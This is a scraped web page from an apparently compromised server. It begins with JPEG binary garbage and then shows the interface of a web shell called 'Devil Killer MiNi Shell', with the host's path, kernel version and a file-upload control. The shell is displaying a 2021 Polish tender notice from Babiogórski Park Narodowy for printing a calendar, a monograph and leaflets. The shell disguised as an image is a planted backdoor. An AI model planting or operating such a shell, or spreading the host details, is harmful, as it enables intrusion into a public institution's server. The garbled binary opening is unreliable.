JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211013/0023124301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Druk i dostawa kalendarza ściennego, monografii „Fauna masywu Babiej Góry. Bezkręgowce” i ulotek. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">BABIOGÓRSKI PARK NARODOWY Z SIEDZIBĄ W ZAWOI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 122462192</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1403</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawoja</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-222</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">338775110</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@bgpn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bgpn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ochrona Przyrody </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Druk i dostawa kalendarza ściennego, monografii „Fauna masywu Babiej Góry. Bezkręgowce” i ulotek. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-79475e68-2c0d-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00231243</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010491/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Druk i dostawa Monografii "Fauna masywu Babiej Góry. Bezkręgowce."</p> <p class="mb-0">1.3.5 Druk i dostawa kalendarza ściennego i ulotek.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.malopolska.pl/bgpn , www.miniportal.uzp.gov.pl , www.bgpn.pl/przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a <br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu <br/>https://miniportal.uzp.gov.pl/ , ePUAPu https://epuap.gov.pl/wps/portal oraz za <br/>pośrednictwem poczty elektronicznej: zamowienia@bgpn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia <br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na <br/>ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz <br/>do formularza do komunikacji.<br/>7.3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji <br/>elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie <br/>korzystania z miniPortalu dostępnym pod adresem <br/>https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP.<br/>7.4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia <br/>publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie <br/>miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień <br/>tego regulaminu.<br/>7.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych <br/>formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>7.6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, <br/>podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz <br/>innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, <br/>przyjmuje się datę ich przekazania na ePUAP.<br/>7.7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż <br/>oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem <br/>dedykowanego formularza dostępnego na ePUAP, udostępnionego przez miniPortal <br/>(Formularz do komunikacji) oraz za pomocą poczty elektronicznej: <br/>zamowienia@bgpn.pl . Korespondencja przesłana za pomocą tego formularza nie <br/>może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym <br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP) <br/>lub ZP-19/2021.<br/>7.8. Dane postępowanie można wyszukać na Liście wszystkich postępowań w miniPortalu <br/>klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z <br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z <br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>I. Administrator danych osobowych<br/>Administratorem Pani/Pana danych osobowych jest Babiogórski Parku Narodowego z <br/>siedzibą w Zawoi, 34- 222 Zawoja 1403, NIP: 552-171-36-27, Regon 122462192; <br/>II. Inspektor Ochrony Danych <br/>Administrator wyznaczył Inspektora Ochrony Danych Osobowych w Babiogórskim Parku <br/>Narodowego z siedzibą w Zawoi, kontakt: iodo@bgpn.pl lub pisemnie na adres siedziby <br/>administratora z dopiskiem „Inspektor ODO”; <br/>III. Cele przetwarzania danych i podstawy prawne przetwarzania<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b przetwarzanie <br/>jest niezbędne do wykonania umowy lub do podjęcia działań na Pani/Pana żądanie przed <br/>zawarciem umowy oraz art. 6 ust. 1 lit. c wypełnienia obowiązku prawnego ciążącego na <br/>administratorze:- w celach związanych z postępowaniem o udzielenie zamówienia publicznego na <br/>przeprowadzenie robót budowlanych prowadzonym w trybie zgodnym z ustawą z dnia 11 <br/>września 2019 r. - Prawo zamówień publicznych;<br/>- w celach związanych z prowadzeniem dokumentacji finansowej i księgowej na podstawie <br/>ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych oraz ustawy z dnia 29 września <br/>1994 r. o rachunkowości;<br/>- w celu wykonania prac budowlanych zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo <br/>budowlane;<br/>- w celach archiwalnych zgodnie z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie <br/>archiwalnym i archiwach.<br/>IV. Odbiorcy danych<br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona <br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo <br/>zamówień publicznych z dnia 11 września 2019 r. oraz osoby lub podmioty, którym <br/>zostanie przekazana dokumentacja budowlana na podstawie przepisów ustawy Prawo <br/>budowlane. Dane osobowe pozyskane w związku z zawartą umową mogą być podmiotom <br/>przetwarzającym świadczącym dla administratora usługi teleinformatyczne, księgowe, <br/>prawe oraz pocztowe. <br/>V. Okres przechowywania danych <br/>Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celów <br/>przetwarzania, nie krócej niż okres wskazany w przepisach o archiwizacji tj. ustawie z dnia <br/>14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">VI. Prawa i obowiązki osób, których dane dotyczą <br/>- Podanie danych związanym z udziałem w postępowaniu o udzielenie zamówienia <br/>publicznego jest wymogiem ustawowym. Konsekwencje niepodania określonych danych <br/>wynikają z ustawy Prawo zamówień publicznych. Podanie danych niezbędnych do zawarcia <br/>umowy i jej realizacji jest dobrowolne, ale konieczne do jej podpisania. <br/>- Osobie, której dane dotyczą, przysługuje:<br/>‒ prawo dostępu do swoich danych oraz otrzymania ich kopii (art. 15 RODO),<br/>‒ prawo do sprostowania swoich danych (art. 16 RODO),<br/>‒ prawo do usunięcia swoich danych (art. 17 RODO) - jeśli nie zaistniały okoliczności, o<br/>których mowa w art. 17 ust. 3 RODO,<br/>‒ prawo do żądania od administratora ograniczenia przetwarzania swoich danych (art. 18 <br/>RODO),<br/>‒ prawo do przenoszenia swoich danych (art. 20 RODO) - jeśli przetwarzanie odbywa się na <br/>podstawie umowy: w celu jej zawarcia lub realizacji (w myśl art. 6 ust. 1 lit. b RODO), oraz w <br/>sposób zautomatyzowany ,<br/>‒ prawo wniesienia sprzeciwu wobec przetwarzania swoich danych (art. 21 RODO) - jeśli <br/>przetwarzanie odbywa się w celu wykonywania zadania realizowanego w interesie <br/>publicznym lub w ramach sprawowania władzy publicznej, powierzonej administratorowi <br/>(tj. w celu, o którym mowa w art. 6 ust. 1 lit. e RODO),<br/>‒ prawo wniesienia skargi do organu nadzorczego Prezesa Urzędu Ochrony Danych <br/>Osobowych, ul. Stawki 2, 00-193 Warszawa, (art. 77 RODO) - w przypadku, gdy osoba uzna, <br/>iż przetwarzanie jej danych osobowych narusza przepisy RODO lub inne krajowe przepisy <br/>regulujące kwestię ochrony danych osobowych, obowiązujące w Rzeczpospolitej Polskiej. - Dane osobowe nie będą objęte procesem zautomatyzowanego podejmowania decyzji, w <br/>tym profilowania.<br/>2. Informacja dla osób fizycznych, których dane osobowe zostaną przekazane <br/>Zamawiającemu przez Wykonawcę w związku z udziałem w postępowaniu lub zawarciem i <br/>realizacją umowy o zamówienie publiczne (w szczególności pracownikom Wykonawcy lub <br/>podwykonawcom), wynikająca z art.14 RODO:<br/>Poza informacjami zawartymi w pkt. 1 Informacja o przetwarzaniu danych osobowych <br/>informujemy, że:<br/>- źródłem pochodzenia danych jest Wykonawca;<br/>- od Wykonawcy pozyskano imię i nazwisko osób, skierowanych przez Wykonawcę do <br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, <br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i <br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu <br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi <br/>osobami. <br/>3. Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym <br/>wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną <br/>Zamawiającemu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa <br/>w art. 14 ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-19/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1. Przedmiotem niniejszego zamówienia jest usługa polegająca na druku i dostawie do <br/>siedziby Zamawiającego – Dyrekcji Babiogórskiego Parku Narodowego, 34-222 Zawoja <br/>1403 – następujących pozycji:<br/>4.1.1. Kalendarza ściennego na 2022 rok w ilości 1000 sztuk.<br/>4.1.2. Monografii „Fauna masywu Babiej Góry. Bezkręgowce” w ilości 300 sztuk.<br/>4.1.3. Ulotki 2 rodzaje – każda po 10 000 sztuk.<br/>4.2. Zamówienie nie zostało podzielone na części<br/>4.3. Szczegółowa opis przedmiotu zamówienia zawarty jest w załączniku nr 1 do SWZ ZP19/2021 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79823000-9 - Usługi drukowania i dostawy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">22100000-1 - Drukowane książki, broszury i ulotki</p> <p class="mb-0">30199792-8 - Kalendarze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16.1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami: <br/>a) Cena (C) – 60%<br/>W ramach kryterium „Cena” ocenie podlegać będzie cena łączna brutto podana w <br/>formularzu oferty (załącznik nr 2 do SWZ). Jeżeli złożono ofertę, której wybór <br/>prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z <br/>przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty <br/>dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby <br/>obowiązek rozliczyć zgodnie z tymi przepisami (art. 225 ust. 1 PZP). Ocena ofert <br/>zostanie dokonana przy zastosowaniu wzoru:<br/>C = Cn/Co x 100 punktów x 60%<br/>gdzie: C – liczba punktów w ramach kryterium „Cena”, <br/>Cn - najniższa cena spośród ofert ocenianych <br/>Co - cena oferty ocenianej Ocenie będą podlegać wyłącznie oferty nie podlegające <br/>odrzuceniu.<br/>b) Termin realizacji zamówienia (T) – 40 %<br/>W ramach kryterium „Termin realizacji zamówienia” ocena ofert będzie liczona w <br/>dniach roboczych od daty podpisania umowy i zostanie dokonana zgodnie z zasadą:<br/>- jeśli Wykonawca zaoferuje termin do 10 dni roboczych – oferta otrzyma 40 pkt,<br/>- jeśli Wykonawca zaoferuje termin do 11 do 15 dni roboczych – oferta otrzyma 20<br/>pkt,<br/>- jeśli Wykonawca zaoferuje termin do 16 do 20 dni roboczych – oferta otrzyma 10<br/>pkt,<br/>- jeśli Wykonawca zaoferuje termin do 21 dni roboczych – oferta otrzyma 0 pkt,<br/>- jeśli Wykonawca zaoferuje termin 22 dni i powyżej – oferta zostanie odrzucona.<br/>W przypadku zaoferowania terminu dostarczenia przedmiotu zamówienia jako <br/>przedział czasowy „od dnia … do dnia …”, Zamawiający uzna że został zaproponowany <br/>dłuższy z zaproponowanych terminów i oferta otrzyma liczbę punktów odpowiadającą <br/>temu terminowi. Zaoferowanie innego terminu lub terminów niż określone w swz <br/>spowoduje odrzucenie oferty.<br/>W przypadku braku zaoferowania terminu, Zamawiający uzna, że zaoferowany został <br/>maksymalny termin, tj. 30 dni roboczych i oferta otrzyma 0 pkt w tym kryterium.<br/> Za najkorzystniejszą zostanie uznana oferta z najwyższą punktacją za kryteria<br/>określone w pkt. 16.1. P = C + T – łączna liczba zdobytych punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 19.1. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w <br/>postępowaniu, o których mowa w art. 112 ust. 2 PZP dotyczące:<br/>1) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli <br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu <br/>składania oferty (a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/>okresie) zrealizował lub realizuje (przy czym w tym przypadku będzie liczona <br/>wartość zrealizowanej części przedmiotu umowy) druk i dostawę:<br/>- co najmniej 1 publikacji o charakterze popularno-naukowym, naukowym lub <br/>albumowym w twardej oprawie o formacie nie mniejszym niż B5 i objętości co <br/>najmniej 80 stron oraz <br/>- co najmniej 2 wydawnictw spiralowanych,<br/>Kwota każdej z publikacji powinna mieć wartość nie mniejszą niż 5 000 zł brutto; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące <br/>wstępne potwierdzenie spełnienia warunków udziału w postępowaniu <br/>określonych w SWZ i braku podstaw do wykluczenia. (załącznik nr 3 do SWZ ZP19/2021)<br/>2) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 <br/>lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 <br/>i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub <br/>wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o <br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub <br/>wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego <br/>wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 5 do SWZ <br/>ZP-19/2021);<br/>4) informacji z Krajowego Rejestru Karnego w zakresie: <br/>a) art. 108 ust. 1 pkt 1 i 2 ustawy z dnia 11 września 2019 r. - Prawo <br/>zamówień publicznych, zwanej dalej „ustawą”,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się o <br/>zamówienie publiczne tytułem środka karnego,<br/>c) art. 109 ust. 1 pkt 2 lit. a ustawy, <br/>d) art. 109 ust. 1 pkt 2 lit. b ustawy, dotyczącej ukarania za wykroczenie, za <br/>które wymierzono karę aresztu,<br/>e) art. 109 ust. 1 pkt 3 ustawy, dotyczącej skazania za przestępstwo lub <br/>ukarania za wykroczenie, za które wymierzono karę aresztu -sporządzonej <br/>nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>5) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej <br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 <br/>pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, <br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące <br/>wstępne potwierdzenie spełnienia warunków udziału w postępowaniu <br/>określonych w SWZ i braku podstaw do wykluczenia. (załącznik nr 3 do SWZ ZP19/2021)<br/>3) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub 